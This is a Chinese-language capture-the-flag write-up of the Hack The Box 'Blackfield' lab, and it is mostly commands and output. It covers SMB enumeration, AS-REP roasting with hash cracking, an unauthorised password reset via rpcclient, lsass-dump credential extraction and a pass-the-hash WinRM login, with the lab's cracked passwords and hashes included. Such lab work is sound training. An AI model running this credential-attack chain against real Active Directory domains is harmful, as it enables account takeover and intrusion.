Blackfield-htb-writeup

0x00 靶场技能介绍

章节技能:SMB目录名为用户ID、kerbrute、AS-reproasting、ldap枚举、bloodhound、rpcclient修改用户密码、lsass.zip转储、pypykatz解密、SeBackUpPrivilege、Backup Operators、备份SAM、impacket-secretsdump、ntds.dit、卷影备份

参考链接:https://0xdf.gitlab.io/2020/10/03/htb-blackfield.html#smb---tcp-445

参考链接:https://github.com/darshannn10/HackTheBox/blob/main/Windows%20Boxes/BlackField/BlackField.md

0x01 用户权限获取

1、靶机介绍:

Backfield 是一台困难的 Windows 机器,具有 Windows 和 Active Directory 错误配置。对 SMB 共享的匿名/来宾访问用于枚举用户。一旦发现用户禁用了 Kerberos 预身份验证,我们就可以进行 ASREPRoasting 攻击。这使我们能够检索 AS-REP 中包含的加密材料的哈希值,该哈希值可以受到离线强力攻击以恢复明文密码。通过此用户,我们可以访问包含取证工件的 SMB 共享,包括 lsass 进程转储。其中包含具有 WinRM 权限的用户的用户名和密码,该用户也是 Backup Operators 组的成员。该特权组授予的权限用于转储 Active Directory 数据库,并检索主域管理员的哈希值。

2、获取下靶机IP地址:10.10.10.192

3、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.192                                                                                
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 06:06 CST
Nmap scan report for 10.10.10.192
Host is up (0.32s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,135,139,445,593,5985,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,593,5985 -sC -sV --min-rate=10000 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 06:08 CST
Nmap scan report for 10.10.10.192
Host is up (0.088s latency).

PORT     STATE    SERVICE       VERSION
53/tcp   open     domain        Simple DNS Plus
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  filtered netbios-ssn
445/tcp  open     microsoft-ds?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
5985/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-05-15T21:04:22
|_  start_date: N/A
|_clock-skew: -1h04m44s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

4、端口开放的还是比较少的,先看下SMB服务吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u null

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.192:445        Name: 10.10.10.192              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

5、枚举其中的 profiles$ 目录,发现非常多的空目录,这里只把目录名保存下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -N //10.10.10.192/profiles$ -c "recurse; ls"
  .                                   D        0  Thu Jun  4 00:47:12 2020
  ..                                  D        0  Thu Jun  4 00:47:12 2020
  AAlleni                             D        0  Thu Jun  4 00:47:11 2020
  ABarteski                           D        0  Thu Jun  4 00:47:11 2020
  ABekesz                             D        0  Thu Jun  4 00:47:11 2020
  ABenzies                            D        0  Thu Jun  4 00:47:11 2020
  ABiemiller                          D        0  Thu Jun  4 00:47:11 2020
  AChampken                           D        0  Thu Jun  4 00:47:11 2020
  ACheretei                           D        0  Thu Jun  4 00:47:11 2020
  ACsonaki                            D        0  Thu Jun  4 00:47:11 2020
  AHigchens                           D        0  Thu Jun  4 00:47:11 2020
  AJaquemai                           D        0  Thu Jun  4 00:47:11 2020
  AKlado                              D        0  Thu Jun  4 00:47:11 2020
  AKoffenburger                       D        0  Thu Jun  4 00:47:11 2020
  AKollolli                           D        0  Thu Jun  4 00:47:11 2020
....................

6、这里把上面的目录保存到本地,并使用正则,只取前面的目录名,这里我使用AI帮我处理一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch dirname.txt

awk '{print $1}' dirname.txt > name.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ awk '{print $1}' dirname.txt > name.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat name.txt 
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
......
ZMiick
ZScozzari
ZTimofeeff
ZWausik

7、绑定下本地hosts后,先验活一下,再开始asreproasting攻击

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.192 blackfield.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.192 blackfield.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d blackfield.local --dc 10.10.10.192  ../name.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 05/16/24 - Ronnie Flathers @ropnop

2024/05/16 06:41:41 >  Using KDC(s):
2024/05/16 06:41:41 >   10.10.10.192:88

2024/05/16 06:42:16 >  [+] VALID USERNAME:       audit2020@blackfield.local
2024/05/16 06:44:21 >  [+] VALID USERNAME:       support@blackfield.local
2024/05/16 06:44:22 >  [+] VALID USERNAME:       svc_backup@blackfield.local
2024/05/16 06:44:52 >  Done! Tested 314 usernames (3 valid) in 190.277 seconds

8、只有3个用户存在,开始尝试AS-REPROasting攻击吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch domainname.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat domainname.txt  
audit2020
support
svc_backup

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -no-pass -usersfile domainname.txt blackfield.local/ -dc-ip 10.10.10.192
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

9、破解下获取到的哈希值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash          
$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 18200 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda958e73cc9686be42e2d6af$17abd5425f2bc590d38fee71e10a20d1ad9fdb27a8bd6075ac6798554b0b66feec63ae99fca48b126ab68e3377302c0631247e639ee58bfb8fd00b9d5e1d118eee13ecf372831a608b78707655de97ae6d181319c817be22394f2e95ab98cb852886286eebc0b249375bd78ebebfacadd490019e6a52fe8f57bc958a84bd91b32f33d5a9eeb4f7d07622ddee170b3d35e745d2d697db248fb741ae176574d4e2a68cdf522484ec5156e2031cc15afdb95eff7f01930d34d141fcf6c163581034d5849e1613dc86143a1e193eb62acb2cecc6b0f5b2e283802c89ff567c558bd5cb64cce115a63c8a860ef2da0aa9eb78a08013d4:#00^BlackKnight
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:aace551cda95...8013d4
Time.Started.....: Thu May 16 06:57:17 2024 (8 secs)
Time.Estimated...: Thu May 16 06:57:25 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1821.1 kH/s (0.46ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14334976/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1Fan465 -> #!hrvert
Hardware.Mon.#1..: Util: 80%

Started: Thu May 16 06:57:16 2024
Stopped: Thu May 16 06:57:27 2024

10、查看下该账号是否有winrm和smb权限

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\support:#00^BlackKnight
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight

11、那就只查看下SMB的目录权限吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.192:445        Name: blackfield.local          Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share

12、嗯,一会再看,先用bloodhound-python工具查看下域权限吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 33S
INFO: Compressing output into 20240516070530_bloodhound.zip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL's password without knowing that user's current password.

用户SUPPORT@BLACKFIELD.LOCAL具有更改用户的能力AUDIT2020@BLACKFIELD.LOCAL的密码,而不知道该用户的当前密码。


使用samba的net工具来更改用户的密码。凭据可以以明文形式提供,如果从命令行中省略,则可以交互提示。如果从命令行中省略,将提示输入新密码。

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

传递散列也可以在这里使用pth工具包的net工具完成。如果LM散列未知,则必须将其替换为ffffffffff。

pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

既然您知道了目标用户的纯文本密码,您就可以以该用户的身份启动新的代理,或者将该用户的凭据与PowerView的ACL滥用功能结合使用,甚至可以将RDP连接到目标用户可以访问的系统。有关更多想法和信息,请参阅参考选项卡。

13、那就按照提示修改下这个用户的密码吧

1
2
┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "Admin@123"'

14、看看这个账号有哪些权限

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Admin@123'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Admin@123 
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Admin@123'
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\audit2020:Admin@123

15、依旧是只有SMB权限,那就看下SMB目录权限吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.192 -u audit2020 -p 'Admin@123'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.192:445        Name: blackfield.local          Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Admin@123' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Admin@123 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share

16、列一下SMB共享目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U audit2020%'Admin@123' //10.10.10.192/forensic -c "recurse; ls"
  .                                   D        0  Sun Feb 23 21:03:16 2020
  ..                                  D        0  Sun Feb 23 21:03:16 2020
  commands_output                     D        0  Mon Feb 24 02:14:37 2020
  memory_analysis                     D        0  Fri May 29 04:28:33 2020
  tools                               D        0  Sun Feb 23 21:39:08 2020

\commands_output
  .                                   D        0  Mon Feb 24 02:14:37 2020
  ..                                  D        0  Mon Feb 24 02:14:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 21:00:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 20:51:52 2020
  domain_users.txt                    A    16454  Sat Feb 29 06:32:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 20:53:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 20:50:28 2020
  netstat.txt                         A     3842  Sun Feb 23 20:51:01 2020
  route.txt                           A     3976  Sun Feb 23 20:53:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 20:56:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 20:54:29 2020

\memory_analysis
  .                                   D        0  Fri May 29 04:28:33 2020
  ..                                  D        0  Fri May 29 04:28:33 2020
  conhost.zip                         A 37876530  Fri May 29 04:25:36 2020
  ctfmon.zip                          A 24962333  Fri May 29 04:25:45 2020
  dfsrs.zip                           A 23993305  Fri May 29 04:25:54 2020
  dllhost.zip                         A 18366396  Fri May 29 04:26:04 2020
  ismserv.zip                         A  8810157  Fri May 29 04:26:13 2020
  lsass.zip                           A 41936098  Fri May 29 04:25:08 2020
  mmc.zip                             A 64288607  Fri May 29 04:25:25 2020
  RuntimeBroker.zip                   A 13332174  Fri May 29 04:26:24 2020
  ServerManager.zip                   A 131983313  Fri May 29 04:26:49 2020
  sihost.zip                          A 33141744  Fri May 29 04:27:00 2020
  smartscreen.zip                     A 33756344  Fri May 29 04:27:11 2020
  svchost.zip                         A 14408833  Fri May 29 04:27:19 2020
  taskhostw.zip                       A 34631412  Fri May 29 04:27:30 2020
  winlogon.zip                        A 14255089  Fri May 29 04:27:38 2020
  wlms.zip                            A  4067425  Fri May 29 04:27:44 2020
  WmiPrvSE.zip                        A 18303252  Fri May 29 04:27:53 2020

\tools

17、这个目录里的资产是真的多啊啊啊啊啊啊,我就只列我想要的吧

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U audit2020%'Admin@123' //10.10.10.192/forensic
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis\
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now

18、lsass.zip 文件实在是太大了,下载不下来,我就直接绕过了,把需要使用的命令列一下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
unzip lsass.zip 

file lsass.DMP 

ls -lh lsass.DMP 


pypykatz lsa minidump lsass.DMP

        == MSV ==                          
                Username: svc_backup                      
                Domain: BLACKFIELD   
                LM: NA                              
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        == WDIGEST [633ba]==                              
                username svc_backup
                domainname BLACKFIELD
                password None                             
        == SSP [633ba]==             
                username                   
                domainname
                password None
        == Kerberos ==
                Username: svc_backup                      
                Domain: BLACKFIELD.LOCAL   
                Password: None                            
        == WDIGEST [633ba]==                              
                username svc_backup
                domainname BLACKFIELD
                password None

19、这里就从内存中获取到了账号密码哈希,下面开始尝试

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d 
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

20、漂亮,这里的账号密码,可以登录winrm服务,开始登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
                                        
Evil-WinRM shell v3.5
                                        
